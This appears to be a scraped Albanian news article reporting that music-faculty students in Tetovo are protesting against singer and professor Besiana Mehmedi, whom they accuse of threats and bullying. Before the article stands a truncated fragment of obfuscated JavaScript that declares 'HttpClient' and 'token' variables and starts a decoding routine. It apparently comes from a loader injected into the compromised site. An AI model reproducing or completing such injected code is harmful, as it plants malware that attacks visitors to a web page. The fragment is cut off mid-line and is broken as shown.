;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kërcënime, presion, bullizim, studentët dalin kundër këngëtares Besiana Mehmedi

By

Këngëtarja e njohur, Besiana Mehmedi, njëherësh profesore në Fakultetin e Muzikës në Tetovë është bërë arsyeja përse prej javësh, studentët po e bojkotojnë lëndën e saj.

Studentët mes tjerash kanë protestuar për shkak të gjuhës kërcënuese e bullizuese të Mehmedit.

“Edhe pse ka vite që gjuha e profesoreshës inordinare Besiana Mehmedi ka qenë dhe vazhdon të jetë kundër çdo kodeksi etik të sjelljes, ditëve të fundit situata po bëhej gjithnjë më e padurueshme, sidomos me rastin e fundit ku reagimi në “Fejsbuk” i njërit prej studentëve në një postim, u bë “shkak” që kjo e fundit përdori një gjuhë që nuk i ka hije një profesoreshe si dhe kreu vepër penale duke e kërcënuar atë se “do e kap për fyti” dhe se me paralajmërimin se në të ardhmen duhet të “kemi kujdes si sillemi në Fejsbuk”, tha në protestë Ardi Lena, Student në Fakultetin e muzikës USHT.

Poashtu, studentët kanë pretenduar se një prej kolegeve të tyre ka përfunduar në spital pas sjelljeve të profesoreshës Mehmedi e cila sipas tyre mes tjerash i ka kërcënuar studentët, se “do t’i kapë për fyti”.

Protestës i është bashkuar edhe vokalisti i “Elita 5”, Arif Ziberi.

Deri tani, Mehmedi nuk është deklaruar për akuzat. /Prive.al

Artikuj të ngjashëm